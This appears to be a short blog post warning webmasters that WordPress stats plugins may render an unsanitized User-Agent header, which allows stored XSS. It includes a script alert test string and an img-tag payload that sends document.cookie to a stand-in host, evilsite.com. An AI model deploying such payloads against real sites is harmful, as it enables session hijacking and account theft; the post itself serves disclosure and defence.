K World

Well, its just not funny way, but very funny way. Neither through a HTTP GET nor a HTTP POST. But, it’s through a header. I haven’t read about this method of XSS up to now, but seriously, its silly and common. Usually webmasters read about the traffic of their websites and Referrer, User-Agent are very common headers they analyze to know the type of visitors and from which site they are coming.

I just spoofed my User-Agent header to “<script>alert(1)</script>”, and when I saw the stats page after that guess what, my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care about looking at your stats (especially in wordpress). One can rather keeping an alert, can keep some thing like this

<img
src=”javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;”
style=visibility:hidden />

The above code will send the cookie to cookie.php page of evilsite.com and the hacker can collect the cookies there using a very simple code and he can become you just by using those cookies. This page has many vectors to use. It doesn’t teach you how to use, so, if you really know what you have to do, you must be knowing this page already.

Result, check your stats plugins and make sure that they are sanitizing all the inputs. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it ?”